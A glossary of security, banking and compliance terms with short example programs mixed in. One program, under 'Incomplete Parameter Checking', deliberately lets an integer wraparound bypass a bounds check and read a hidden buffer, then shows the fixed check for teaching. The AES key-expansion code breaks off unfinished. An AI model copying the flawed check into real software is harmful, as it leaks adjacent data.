Fixed COMSEC Facility | noun | COMSEC facility located in an immobile structure or aboard a ship. | Physical, Regulated, CUI | May 9, 2026
Float | noun | Funds held by an institution during the check-clearing process before being made available to a depositor. Interest may be earned on these funds. | Data, Regulated | May 12, 2026
Forensic Copy | noun | An accurate bit-for-bit reproduction of the information contained on an electronic device or associated media, whose validity and integrity has been verified using an accepted algorithm. | Artifact, Regulated | May 12, 2026
Forensic examination | noun | The process of collecting, assessing, classifying and documenting digital evidence to assist in the identification of an offender and the method of compromise. | Process, Regulated | May 12, 2026
forensic investigation | noun | The application of investigative and analytical techniques to gather and preserve evidence from a digital device impacted by a cyber attack. | Process, Regulated | May 9, 2026
forensic readiness | noun | The ability of an FMI to maximise the use of digital evidence to identify the nature of a cyber attack. | Capability, Regulated | May 12, 2026
forensics | noun | The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data. | Process, Regulated | May 12, 2026
Formal Access Approval | noun | A formalization of the security determination for authorizing access to a specific type of classified or sensitive information, based on specified access requirements, a determination of the individual’s security eligibility and a determination that the individual’s official duties require the individual be provided access to the information. | Control, Regulated, CUI | May 9, 2026
Frequency Hopping | noun | Repeated switching of frequencies during radio transmission according to a specified algorithm, to minimize unauthorized interception or jamming of telecommunications. | Control, Regulated, CUI | May 12, 2026
Full Disk Encryption | noun | The process of encrypting all the data on the hard disk drive used to boot a computer, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product. | Control, Regulated | May 12, 2026
Full-interruption/full-scale test (IT and Staff) | noun | A business continuity test that activates all the components of the disaster recovery plan at the same time. Hardware, software, staff, communications, utilities, and alternate site processing should be thoroughly tested in this type of testing activity. The exercise should include the business line end users and the IT group to ensure that each business line tests its key applications and is prepared to recover and resume its business operations in the event of an emergency. The full test verifies that systems and staff can recover and resume business within established recovery time objectives. End users should verify the integrity of the data at the alternate site after the IT group has restored systems and applications needed for the staff to perform production activities. | Process, Regulated | May 9, 2026
fund | noun | Assets in the form of money. | Data, Regulated | May 12, 2026
funds transfer terminal | noun | An information processing device used for the purpose of executing deposit account transactions between financial institutions and their customers by either the direct transmission of electronic impulses or the recording of electronic impulses for delayed processing. | System, Regulated, PCI | May 9, 2026
Global Information Grid | noun | The globally interconnected, end-to-end set of information capabilities for collecting, processing, storing, disseminating, and managing information on demand to warfighters, policy makers, and support personnel. The GIG includes owned and leased communications and computing systems and services, software (including applications), data, security services, other associated services, and National Security Systems. Non-GIG IT includes stand-alone, self-contained, or embedded IT that is not, and will not be, connected to the enterprise network. | System, Regulated, CUI | May 9, 2026
government body | noun | The government of any country or of any political subdivision of any country, including: any instrumentality of any such government; any other person or organization authorized by law to perform any executive, legislative, judicial, regulatory, administrative, military, or police functions of any such government; and any intergovernmental organization. | Organization, Regulated | May 9, 2026
Government Emergency Telecommunications Service (GETS) | noun | Acronym for the Government Emergency Telecommunications Service card program. GETS cards provide emergency access and priority processing for voice communications services in emergency situations. | Capability, Regulated, CUI | May 12, 2026
Gramm-Leach-Bliley Act (GLBA) | noun | The act, also known as the Financial Services Modernization Act of 1999, (Pub.L. 106-102, 113 Stat. 1338, enacted November 12, 1999), required the federal banking agencies to establish information security standards for financial institutions. | Framework, Regulated, PII | May 9, 2026
grant access to the system | noun | The purpose of this task is to permit a user to logically or physically gain entry to a computer and/or network. | Process, Regulated | May 12, 2026
Graphical Processing Unit (gpu) | noun | | Regulated | May 13, 2026
Haircut | noun | With respect to an eligible currency, the percentage increase of a negative currency balance or reduction of a positive currency balance; it is based on (a) the volatility of the historic foreign exchange movements in the applicable eligible currency determined by CLS Bank and (b) an add-on component. | Metric, Regulated | May 12, 2026
Hard Copy Key | noun | Physical keying material, such as printed key lists, punched or printed key tapes, or programmable, read-only memories (PROM). | Physical, Regulated, CUI | May 9, 2026
hardware integrity | noun | The assurance that any given hardware asset is not a counterfeit, or otherwise falsely represented as being whole and intact as measured against original specifications. | System, Regulated | May 9, 2026
Hash-based Message Authentication Code | noun | A message authentication code that uses a cryptographic key in conjunction with a hash function. | Control, Regulated | May 12, 2026
Health Information Exchange | noun | A health information organization that brings together healthcare stakeholders within a defined geographic area and governs health information exchange among them for the purpose of improving health and care in that community. | Organization, Regulated, PHI | May 9, 2026
High Assurance Guard | noun | A guard that has two basic functional capabilities: a Message Guard and a Directory Guard. The Message Guard provides filter service for message traffic traversing the Guard between adjacent security domains. The Directory Guard provides filter service for directory access and updates traversing the Guard between adjacent security domains. | System, Regulated, CUI | May 12, 2026
High Impact | noun | The loss of confidentiality, integrity, or availability that could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States (i.e., 1) causes a severe degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in major damage to organizational assets; 3) results in major financial loss; or 4) results in severe or catastrophic harm to individuals involving loss of life or serious life threatening injuries). | Metric, Regulated, CUI | May 12, 2026
high impact Bulk Electric System Cyber System | noun | A Bulk Electric System Cyber System in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a potential impact value of high. | System, Regulated, CUI | May 9, 2026
High-Impact System | noun | An information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of high. | System, Regulated, CUI | May 9, 2026
Hijacking | noun | The use of an authenticated user's communication session to communicate with system components. | Threat, Regulated | May 12, 2026
Homing beacons | noun | Devices that send messages to the institution when they connect to a network and that enable recovery of the device. | Physical, Regulated | May 12, 2026
Hot Site | noun | Backup site that includes phone systems with the phone lines already connected. Networks will also be in place, with any necessary routers and switches plugged in and turned on. Desks will have desktop PCs installed and waiting, and server areas will be replete with the necessary hardware to support business-critical functions. Within a few hours, a hot site can become a fully functioning element of an organization. | Physical, Regulated | May 12, 2026
Human Subjects | noun | | Regulated | May 13, 2026
IA Infrastructure | noun | The underlying security framework that lies beyond an enterprise’s defined boundary, but supports its IA and IA-enabled products, its security posture and its risk management plan. | System, Regulated, CUI | May 12, 2026
ICT supply chain threat | noun | A man-made threat achieved through exploitation of the information and communications technology (ICT) system’s supply chain, including acquisition processes. | Threat, Regulated | May 9, 2026
Identification and Authentication | noun | The purpose of this function is to verify the identity of an entity through the use of specific credentials as a prerequisite for granting access to resources in an IT system. | Capability, Regulated | May 12, 2026
identity | noun | The set of attribute values (i.e., characteristics) by which an entity is recognizable and that, within the scope of an identity manager’s responsibility, is sufficient to distinguish that entity from any other entity. | Identity, Regulated, PII | May 12, 2026
Identity Binding | noun | Binding of the vetted claimed identity to the individual (through biometrics) according to the issuing authority. | Process, Regulated, PII | May 9, 2026
identity management | noun | The purpose of this task is to implement a set of functions and capabilities used for assurance of identity information (e.g., identifiers, credentials, attributes). | Capability, Regulated, PII | May 9, 2026
Identity Proofing | noun | The process by which a Credentials Service Provider (CSP) and a Registration Authority (RA) collect and verify information about a person for the purpose of issuing credentials to that person. | Process, Regulated, PII | May 9, 2026
Identity Registration | noun | The process of making a person’s identity known to the Personal Identity Verification (PIV) system, associating a unique identifier with that identity, and collecting and recording the person’s relevant attributes into the system. | Process, Regulated, PII | May 9, 2026
Identity Verification | noun | The process of confirming or denying that a claimed identity is correct by comparing the credentials (something you know, something you have, something you are) of a person requesting access with those previously proven and stored in the PIV Card or system and associated with the identity being claimed. | Process, Regulated, CUI | May 12, 2026
Image | noun | An exact bit-stream copy of all electronic data on a device, performed in a manner that ensures that the information is not altered. | Artifact, Regulated | May 12, 2026
Image archive (Check 21) | noun | Database for storage and easy retrieval of check images. | Data, Regulated, PII | May 9, 2026
Image capture (Check 21) | noun | The process of digitizing both sides of physical items and their assorted MICR information as they are processed at the Federal Reserve Bank. Also includes storage of the images for up to 60 days. | Process, Regulated, PII | May 12, 2026
Image exchange (Check 21) | noun | Exchange of some or all of the digitized images of a check. | Process, Regulated, PCI | May 9, 2026
Imitative Communications Deception | noun | Introduction of deceptive messages or signals into an adversary's telecommunications signals. See also Communications Deception and Manipulative Communications Deception. | Threat, Regulated, CUI | May 12, 2026
Impact Level | noun | The magnitude of harm that can be expected to result from the consequences of unauthorized disclosure of information, unauthorized modification of information, unauthorized destruction of information, or loss of information or information system availability. | Metric, Regulated | May 9, 2026
Impersonation | noun | | Threat, Regulated | May 13, 2026
Implant | noun | Electronic device or electronic equipment modification designed to gain unauthorized interception of information-bearing emanations. | Threat, Regulated, CUI | May 9, 2026
in-house developed application | noun | An application that has been developed within the organization. | System, Regulated | May 12, 2026
In-Processing | noun | | Process, Regulated, PII | May 13, 2026
In-Processing Algorithm | noun | | Process, Regulated, PII | May 13, 2026
Inadvertent Disclosure | noun | Type of incident involving accidental exposure of information to an individual not authorized access. | Event, Regulated | May 12, 2026
incident containment processnounAn established or official method for implementing the incident containment policy, or for performing the tasks, processes, or operations that limit and prevent further damage after an incident occurs, while ensuring that forensic evidence which may be needed for future legal action is not destroyed. The method is executed the same way each time so that it produces the same results in the same circumstances.ProcessRegulatedMay 9, 2026
Incident Management SystemnounThe tools (software and otherwise), reports, and processes used to input, process, and close incident reports from input through resolution.SystemRegulatedMay 12, 2026
incident monitoring programnounThe documented activities, policies, and procedures within an organization for organizing and directing all activities undertaken to review, track, evaluate, and report on the status of incidents.ProcessRegulatedMay 9, 2026
Incident ReportnounA record containing the details of an incident. Each incident record documents the lifecycle of a single incident.ArtifactRegulatedMay 12, 2026
incident reportingnounThe purpose of this task is to use hotlines and emergency contacts to alert the appropriate individuals to the occurrence of a security event.ProcessRegulatedMay 9, 2026
incident response activitynounAny task performed by an organization in reaction to an incident.ProcessRegulatedMay 9, 2026
incident response notification processnounA series of steps undertaken to detect, triage, and resolve events that disrupt operations and alert applicable personnel and clients in conformance with pertinent standards.ProcessRegulatedMay 9, 2026
incident response planningnounThe process of creating incident response plans.ProcessRegulatedMay 9, 2026
incident response programnounA documented approach for organizing and directing all activities undertaken to handle known security breaches or attacks in such a way as to limit damage and reduce the time and cost of the organization's recovery.ProcessRegulatedMay 12, 2026
incomenounThe consumption and savings opportunity gained by an entity within a specified time frame, which is generally expressed in monetary terms.DataRegulatedMay 12, 2026
incoming debit and credit totalnounThe total balance of all credit and debit postings that go into an account.MetricRegulatedMay 12, 2026
Incomplete Parameter CheckingnounSystem flaw that exists when the operating system does not check all parameters fully for accuracy and consistency, thus making the system vulnerable to penetration.VulnerabilityRegulatedMay 9, 2026
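The flaw in the entry above is easiest to see side by side with its fix. The block below is an added example, not code from any of the glossary's source documents: a service that copies a caller-supplied (offset, length) window out of a fixed buffer, first with an incomplete check and then with a complete one. The buffer contents, the adjacent "secret" region and the 32-bit wrap (which mimics unsigned arithmetic in a C implementation) are all constructed for illustration.

```python
# Added example: incomplete vs. complete parameter checking.
# Constructed data: a user-readable buffer followed by a region the caller
# must never see. In a real system these would be adjacent allocations.
MASK32 = 0xFFFFFFFF
USER_BUFFER = b"hello world!"           # the region the caller is allowed to read
SECRET_REGION = b"KERNEL-KEY-0xCAFE"    # what an over-read would expose
MEMORY = USER_BUFFER + SECRET_REGION    # the two regions side by side


def read_incomplete(offset: int, length: int) -> bytes:
    """Flawed: only the end address is validated, and it is computed with
    wrapping 32-bit arithmetic, so a length close to 2^32 wraps the sum back
    inside the buffer and the check passes. Neither parameter is checked
    on its own."""
    end = (offset + length) & MASK32
    if end > len(USER_BUFFER):
        raise ValueError("out of range")
    return MEMORY[offset:offset + length]


def read_checked(offset: int, length: int) -> bytes:
    """Complete: each parameter is range-checked individually, then the
    combination is checked in a form that cannot overflow (the subtraction
    is done on the trusted side, never on the untrusted sum)."""
    if not 0 <= offset <= len(USER_BUFFER):
        raise ValueError("bad offset")
    if not 0 <= length <= len(USER_BUFFER) - offset:
        raise ValueError("bad length")
    return USER_BUFFER[offset:offset + length]


def demo() -> dict:
    """Run the same hostile request against both handlers."""
    hostile_length = (1 << 32) - 6      # 6 + hostile_length wraps to 0
    result = {"leaked": read_incomplete(6, hostile_length)}
    try:
        read_checked(6, hostile_length)
        result["checked"] = "allowed"
    except ValueError as exc:
        result["checked"] = f"rejected ({exc})"
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The rejected request in `read_checked` fails on the length check alone; the point is that the combination check is only meaningful once each parameter has been bounded by itself.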
Indemnifying bank (Check 21)nounA financial institution that transfers, presents, or returns a substitute check or a paper or electronic representation of a substitute check for which it receives consideration. The financial institution shall indemnify the recipient and any subsequent recipient (including a collecting or returning financial institution, the depository financial institution, the drawer, the drawee, the payee, the depositor, and any endorser) for any loss incurred by any recipient of a substitute check if that loss occurred due to the receipt of a substitute check instead of the original.OrganizationRegulatedMay 12, 2026
independence standardsnounThe ability, without the service of others, or with a reduced level of the services of others, to function within the community.RequirementRegulatedMay 9, 2026
Independent sales organizationnounA non-financial institution organization that provides a variety of merchant processing functions on behalf of the acquirer. These functions include soliciting new merchant accounts, arranging for terminal purchases or leases, and providing backroom services. An Independent sales organization is also referred to as a member service provider (MSP). The acquirer must register all Independent sales organization/MSPs with the bankcard associations.OrganizationRegulatedPCIMay 12, 2026
Independent Validation AuthoritynounEntity that reviews the soundness of independent tests and system compliance with all stated security controls and risk mitigation actions. IVAs will be designated by the Authorizing Official as needed.OrganizationRegulatedCUIMay 9, 2026
individualnounA citizen of the United States or an alien lawfully admitted for permanent residence. Agencies may, consistent with individual practice, choose to extend the protections of the Privacy Act and E-Government Act to businesses, sole proprietors, aliens, etc.IdentityRegulatedPIIMay 9, 2026
individual accountnounAn account to which only one individual is assigned.IdentityRegulatedMay 9, 2026
Individual AccountabilitynounAbility to associate positively the identity of a user with the time, method, and degree of access to an information system.RequirementRegulatedMay 9, 2026
Industrial Control SystemnounAn information system used to control industrial processes such as manufacturing, product handling, production, and distribution or to control infrastructure assets.SystemRegulatedCUIMay 9, 2026
Industrial Control SystemnounAn information system used to control industrial processes such as manufacturing, product handling, production, and distribution. Industrial control systems include supervisory control and data acquisition systems (SCADA) used to control geographically dispersed assets, as well as distributed control systems (DCS) and smaller control systems using programmable logic controllers to control localized processes.SystemRegulatedCUIMay 9, 2026
information and communication(s) technologynounAny information technology, equipment, or interconnected system or subsystem of equipment that processes, transmits, receives, or interchanges data or information.SystemRegulatedMay 12, 2026
Information Assurance CompliancenounIn the NICE Workforce Framework, cybersecurity work where a person: Oversees, evaluates, and supports the documentation, validation, and accreditation processes necessary to assure that new IT systems meet the organization's information assurance and security requirements; ensures appropriate treatment of risk, compliance, and assurance from internal and external perspectives.CapabilityRegulatedMay 9, 2026
Information Assurance ComponentnounAn application (hardware and/or software) that provides one or more Information Assurance capabilities in support of the overall security and operational objectives of a system.CapabilityRegulatedCUIMay 12, 2026
Information Assurance Vulnerability AlertnounNotification that is generated when an Information Assurance vulnerability may result in an immediate and potentially severe threat to DoD systems and information; this alert requires corrective action because of the severity of the vulnerability risk.VulnerabilityRegulatedCDIMay 12, 2026
Information Flow ControlnounProcedure to ensure that information transfers within an information system are not made in violation of the security policy.ControlRegulatedCUIMay 9, 2026
information neednounInsight necessary to manage objectives, goals, risks and problems.RequirementRegulatedMay 9, 2026
Information OperationsnounThe integrated employment of the core capabilities of electronic warfare, computer network operations, psychological operations, military deception, and operations security, in concert with specified supporting and related capabilities, to influence, disrupt, corrupt, or usurp adversarial human and automated decision-making process, information, and information systems while protecting our own.CapabilityRegulatedCUIMay 9, 2026
Information ResourcesnounInformation and related resources, such as personnel, equipment, funds, and information technology.DataRegulatedMay 9, 2026
Information Security Continuous Monitoring ProcessnounA process to: • Define an ISCM strategy; • Establish an ISCM program; • Implement an ISCM program; • Analyze data and Report findings; • Respond to findings; and • Review and Update the ISCM strategy and program.ProcessRegulatedMay 12, 2026
Information Security Continuous Monitoring ProgramnounA program established to collect information in accordance with pre-established metrics, utilizing information readily available in part through implemented security controls.ProcessRegulatedMay 12, 2026
information security eventnounIdentified occurrence of a system, service or network state indicating a possible breach of information security policy or failure of controls, or a previously unknown situation that may be security relevant.EventRegulatedMay 12, 2026
information security incidentnounA single or a series of unwanted or unexpected information security events that have a significant probability of compromising business operations and threatening information security.EventRegulatedMay 9, 2026
Information Security risknounThe risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information and/or information systems. See Risk.MetricRegulatedCUIMay 12, 2026
information security threatnounAny circumstance or event with the potential to adversely impact the measures taken so that information and information systems are protected from unauthorized access, use, disclosure, disruption, modification, or destruction.ThreatRegulatedMay 12, 2026
Information Sharing Environmentnoun1. An approach that facilitates the sharing of terrorism and homeland security information; or 2. ISE in its broader application enables those in a trusted partnership to share, discover, and access controlled information.SystemRegulatedCUIMay 9, 2026
Information StewardnounIndividual or group that helps to ensure the careful and responsible management of federal information belonging to the Nation as a whole, regardless of the entity or source that may have originated, created, or compiled the information. Information stewards provide maximum access to federal information to elements of the federal government and its customers, balanced by the obligation to protect the information in accordance with the provisions of FISMA and any associated security-related federal policies, directives, regulations, standards, and guidance.RoleRegulatedMay 9, 2026
Information SystemnounA discrete set of information resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information. [Note: Information systems also include specialized systems such as industrial/process controls systems, telephone switching and private branch exchange (PBX) systems, and environmental control systems.]SystemRegulatedMay 12, 2026
information system componentnounA discrete, identifiable information technology asset (e.g., hardware, software, firmware) that represents a building block of an information system. Information system components include commercial information technology products.SystemRegulatedMay 12, 2026
Information System Contingency PlannounManagement policy and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of emergencies, system failures, or disasters.ProcessRegulatedCUIMay 9, 2026
Information System-Related Security RisksnounInformation system-related security risks are those risks that arise through the loss of confidentiality, integrity, or availability of information or information systems and consider impacts to the organization (including assets, mission, functions, image, or reputation), individuals, other organizations, and the Nation.ThreatRegulatedMay 12, 2026
Information Systems SecuritynounProtection of information systems against unauthorized access to or modification of information, whether in storage, processing, or transit, and against the denial of service to authorized users, including those measures necessary to detect, document, and counter such threats.CapabilityRegulatedMay 12, 2026
Information Systems Security Equipment ModificationnounModification of any fielded hardware, firmware, software, or portion thereof, under NSA configuration control. There are three classes of modifications: mandatory (to include human safety); optional/special mission modifications; and repair actions. These classes apply to elements, subassemblies, equipment, systems, and software packages performing functions such as key generation, key distribution, message encryption, decryption, authentication, or those mechanisms necessary to satisfy security policy, labeling, identification, or accountability.ProcessRegulatedCUIMay 9, 2026
information technologynounAny equipment or interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency. For purposes of the preceding sentence, equipment is used by an executive agency if the equipment is used by the executive agency directly or is used by a contractor under a contract with the executive agency which— 1) requires the use of such equipment; or 2) requires the use, to a significant extent, of such equipment in the performance of a service or the furnishing of a product. The term information technology includes computers, ancillary equipment, software, firmware and similar procedures, services (including support services), and related resources.SystemRegulatedMay 12, 2026
Information Technology auditnounAn examination of the controls within an Information technology (IT) infrastructure.ProcessRegulatedMay 12, 2026
Information Technology controlnounRefers to the internal controls over security management, system development and change management, information processing, communications networks and management of technology service providers.ControlRegulatedMay 12, 2026
Information Technology systemnounInformation technology systems are collectively the equipment used to create, store and transmit digital data and any related software owned (or otherwise controlled) and used by the State and its agencies to fulfill its service and obligations to the citizens of Arizona.SystemRegulatedMay 12, 2026
Information TypenounA specific category of information (e.g., privacy, medical, proprietary, financial, investigative, contractor sensitive, security management), defined by an organization or in some instances, by a specific law, Executive Order, directive, policy, or regulation.RequirementRegulatedMay 12, 2026
InsidernounAn entity with authorized access (i.e., within the security domain) that has the potential to harm an information system or enterprise through destruction, disclosure, modification of data, and/or denial of service.ThreatRegulatedMay 12, 2026
Inspectable SpacenounThree dimensional space surrounding equipment that processes classified and/or sensitive information within which TEMPEST exploitation is not considered practical or where legal authority to identify and remove a potential TEMPEST exploitation exists. Synonymous with zone of control.PhysicalRegulatedCUIMay 9, 2026
InstructionnounMeans (i) any instruction submitted by a Member through the submission process directing CLS Bank to settle certain payment entitlements and obligations arising pursuant to an FX transaction eligible for settlement in CLS Bank and (ii) any instructions resulting from the split of Settlement Eligible Instructions.RequirementRegulatedMay 12, 2026
insurance coveragenounThe amount of risk or liability covered for an individual or entity by way of insurance services. Insurance coverage is issued by an insurer in the event of an unforeseen or unwanted occurrences.RequirementRegulatedMay 9, 2026
insurance ridernounAn add-on provision to a basic insurance policy that provides additional benefits to the policyholder at an additional cost. Standard policies usually leave little room for modification or customization beyond choosing deductibles and coverage amounts.RequirementRegulatedMay 9, 2026
interactive remote accessnounUser-initiated access by a person employing a remote access client or other remote access technology using a routable protocol. Remote access originates from a Cyber Asset that is not an Intermediate System and not located within any of the Responsible Entity’s Electronic Security Perimeter(s) or at a defined Electronic Access Point (EAP). Remote access may be initiated from: 1) Cyber Assets used or owned by the Responsible Entity, 2) Cyber Assets used or owned by employees, and 3) Cyber Assets used or owned by vendors, contractors, or consultants. Interactive remote access does not include system-to-system process communications.ProcessRegulatedCUIMay 12, 2026
interactive user accessnounUser access to an operating system by means of a log-in through a Graphical User Interface.ProcessRegulatedMay 12, 2026
Interbank checksnounChecks that are not "on-us." They are cleared and settled either by direct presentment, a clearinghouse association, a correspondent bank, or a Federal Reserve Bank.DataRegulatedMay 12, 2026
InterchangenounExchange of transactions between financial institutions participating in a bank card network, based on a common set of rules. Card interchange allows a financial institution's customers to use a bank credit card at any card honoring merchant and to gain access to multiple ATM systems from a single ATM.ProcessRegulatedPCIMay 9, 2026
Interchange feesnounFees paid by one financial institution to another to cover handling costs and credit risk in a financial institution card transaction. Interchange fees generally flow toward the institution funding the transaction and assuming the risk. In a credit card transaction, the interchange fee is paid by the merchant acquirer accepting the merchant's sales draft to the card-issuing institution, which, in turn, passes the fee to its merchants. In EFT/POS transactions, interchange flows in the opposite direction: the card-issuing institution (or customer) pays the fee to the terminal-owning institution. When a transaction is an off-line debit sale, the card-issuing institution collects an interchange fee from the merchant, rather than from the customer, unlike in an EFT/POS transaction, where the customer pays the interchange fee. Interchange revenue is derived from fees set by the card associations. Depending on the card association, fees can range from 1% to 3% of the value of the transaction. Interchange revenue is recognized as a card issuer's second largest revenue line item.RequirementRegulatedMay 12, 2026
Interconnection Security AgreementnounA document that regulates security-relevant aspects of an intended connection between an agency and an external system. It regulates the security interface between any two systems operating under two different distinct authorities. It includes a variety of descriptive, technical, procedural, and planning information. It is usually preceded by a formal MOA/MOU that defines high-level roles and responsibilities in management of a cross-domain connection.RequirementRegulatedCUIMay 9, 2026
interconnectivitynounThe state or quality of being connected together. The interaction of a financial institution's internal and external systems and applications and the entities with which they are linked.NetworkRegulatedMay 12, 2026
Interface Control DocumentnounTechnical document describing interface controls and identifying the authorities and responsibilities for ensuring the operation of such controls. This document is baselined during the preliminary design review and is maintained throughout the information system life cycle.ArtifactRegulatedCUIMay 9, 2026
Interim Approval to OperatenounTemporary authorization granted by a DAA for an information system to process information based on preliminary results of a security evaluation of the system. (To be replaced by ATO and POA&M)ArtifactRegulatedCUIMay 9, 2026
Interim Approval to TestnounTemporary authorization to test an information system in a specified operational information environment within the time frame and under the conditions or constraints enumerated in the written authorization.RequirementRegulatedCUIMay 9, 2026
Intermediate Certification AuthoritynounA Certification Authority that is subordinate to another CA, and has a CA subordinate to itself.SystemRegulatedMay 9, 2026
intermediate systemnounA Cyber Asset or collection of Cyber Assets performing access control to restrict Interactive Remote Access to only authorized users. The Intermediate System must not be located inside the Electronic Security Perimeter.SystemRegulatedCUIMay 9, 2026
internal controlnounThe purpose of this task is to provide reasonable assurance that operations are effective and efficient, financial reporting is reliable, and applicable laws and regulations are being followed.ControlRegulatedMay 12, 2026
InterrogationnounUsed to obtain prior indicators or relationships, including telephone numbers, IP addresses and names of individuals, from extracted data.ProcessRegulatedPIIMay 12, 2026
IntervenabilitynounRegulatedMay 13, 2026
investigationnounThe purpose of this task is to discover and examine the facts of an incident or allegation to establish the truth.ProcessRegulatedMay 9, 2026
IT Security Awareness and Training ProgramnounExplains proper rules of behavior for the use of agency information systems and information. The program communicates IT security policies and procedures that need to be followed (i.e., NSTISSD 501, NIST SP 800-50).ProcessRegulatedCUIMay 12, 2026
JitternounJitter (or noise) is the modification of fields in a database while preserving the aggregate characteristics that make the database useful in the first place.ControlRegulatedPIIMay 12, 2026
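As an added illustration of the Jitter entry (example code, not from the glossary's sources): each record's value is perturbed by bounded random noise, and the noise is then re-balanced so that the column's sum, and therefore its mean, is exactly unchanged. The salary figures and the `spread` parameter are constructed for the example.

```python
# Added example: jitter that changes individual fields while preserving the
# column total exactly. `seed` exists only so the demo is reproducible.
import random


def jitter(values: list, spread: int, seed=None) -> list:
    """Return a copy of `values` with each entry moved by at most 2*spread,
    chosen so that sum(result) == sum(values)."""
    if spread < 0:
        raise ValueError("spread must be non-negative")
    rng = random.Random(seed)
    noise = [rng.randint(-spread, spread) for _ in values]
    # The raw noise rarely sums to zero; spread the drift back over the
    # records one unit at a time so the total is preserved exactly.
    drift = sum(noise)
    step = 1 if drift > 0 else -1
    for i in range(abs(drift)):
        noise[i % len(noise)] -= step
    return [v + n for v, n in zip(values, noise)]


def mean(values: list) -> float:
    return sum(values) / len(values)


if __name__ == "__main__":
    salaries = [52000, 61000, 48000, 75000, 66000]   # constructed sample column
    released = jitter(salaries, spread=500, seed=42)
    print("original:", salaries, "mean", mean(salaries))
    print("jittered:", released, "mean", mean(released))
```

Sum-preserving noise protects the aggregate, not the individual: if the same records are jittered and released repeatedly with fresh noise, the releases average back toward the true values, so the noise (or the seed) must be fixed per record rather than redrawn per query.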
key controlnounA type of internal control designed to detect errors or fraud in financial statements.ControlRegulatedMay 12, 2026
Key Distribution CenternounCOMSEC facility generating and distributing key in electronic form.SystemRegulatedCUIMay 9, 2026
Key Escrownoun1. The processes of managing (e.g., generating, storing, transferring, auditing) the two components of a cryptographic key by two key component holders. 2. A key recovery technique for storing knowledge of a cryptographic key, or parts thereof, in the custody of one or more third parties called "escrow agents," so that the key can be recovered and used in specified circumstances.ProcessRegulatedCUIMay 9, 2026
Key Escrow SystemnounA system that entrusts the two components comprising a cryptographic key (e.g., a device unique key) to two key component holders (also called "escrow agents").SystemRegulatedCUIMay 9, 2026
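The two-component scheme described in the Key Escrow and Key Escrow System entries can be shown concretely. The block below is an added example, not code from the glossary's sources: it splits a key into components for two or more escrow agents so that recovering the key needs every component and any proper subset is indistinguishable from random. The function and parameter names are the example's own.

```python
# Added example: n-of-n key component escrow by XOR splitting.
# All but one component are fresh random bytes; the last is chosen so that
# XOR-ing every component together yields the original key.
import secrets
from functools import reduce


def xor_all(column) -> int:
    return reduce(lambda a, b: a ^ b, column)


def split_key(key: bytes, holders: int = 2) -> list:
    """Return `holders` components of len(key) bytes each."""
    if holders < 2:
        raise ValueError("need at least two component holders")
    if not key:
        raise ValueError("empty key")
    components = [secrets.token_bytes(len(key)) for _ in range(holders - 1)]
    last = bytes(xor_all(column) for column in zip(key, *components))
    return components + [last]


def recover_key(components: list, expected_holders: int) -> bytes:
    """Reassemble the key; refuse to proceed unless every agent contributed."""
    if len(components) != expected_holders:
        raise PermissionError("all escrow agents must contribute their component")
    if len({len(c) for c in components}) != 1:
        raise ValueError("components differ in length")
    return bytes(xor_all(column) for column in zip(*components))


if __name__ == "__main__":
    device_unique_key = secrets.token_bytes(32)      # constructed stand-in key
    parts = split_key(device_unique_key, holders=2)
    print("agent 1 holds:", parts[0].hex())
    print("agent 2 holds:", parts[1].hex())
    print("recovered ok :", recover_key(parts, 2) == device_unique_key)
```

XOR splitting gives an all-or-nothing split only. If the policy is "any k of n agents may recover the key", a threshold scheme (Shamir secret sharing) is needed instead; that is outside this example.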
Key ExpansionnounRoutine used to generate a series of Round Keys from the Cipher Key.ProcessRegulatedMay 12, 2026
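The Key Expansion entry describes the AES key schedule (FIPS-197, section 5.2). The following block is an added example written from the published algorithm, not code taken from the glossary's sources: it derives the S-box from its definition instead of pasting the table, then expands a 128-, 192- or 256-bit cipher key into the round keys. The only data used are the FIPS-197 Appendix A test key and an all-zero key.

```python
# Added example: AES key expansion (FIPS-197 sec. 5.2) from first principles.

def gf_mul(a: int, b: int) -> int:
    """Multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    r = 0
    for _ in range(8):
        if b & 1:
            r ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return r


def _rotl8(v: int, n: int) -> int:
    return ((v << n) | (v >> (8 - n))) & 0xFF


def build_sbox() -> list:
    """S-box = multiplicative inverse (0 -> 0) followed by the affine map."""
    inv = [0] * 256
    for a in range(1, 256):
        for b in range(1, 256):
            if gf_mul(a, b) == 1:
                inv[a] = b
                break
    return [x ^ _rotl8(x, 1) ^ _rotl8(x, 2) ^ _rotl8(x, 3) ^ _rotl8(x, 4) ^ 0x63
            for x in inv]


SBOX = build_sbox()


def expand_key(key: bytes) -> list:
    """Return Nr+1 round keys of 16 bytes for a 16-, 24- or 32-byte cipher key."""
    if len(key) not in (16, 24, 32):
        raise ValueError("AES key must be 128, 192 or 256 bits")
    nk = len(key) // 4           # key length in 32-bit words
    nr = nk + 6                  # number of rounds
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    rcon = 0x01                  # Rcon[1]; doubled in GF(2^8) each time it is used
    for i in range(nk, 4 * (nr + 1)):
        temp = list(w[i - 1])
        if i % nk == 0:
            temp = temp[1:] + temp[:1]                 # RotWord
            temp = [SBOX[b] for b in temp]             # SubWord
            temp[0] ^= rcon                            # xor Rcon[i/Nk]
            rcon = gf_mul(rcon, 2)
        elif nk > 6 and i % nk == 4:                   # extra SubWord for AES-256
            temp = [SBOX[b] for b in temp]
        w.append([x ^ y for x, y in zip(w[i - nk], temp)])
    words = [bytes(word) for word in w]
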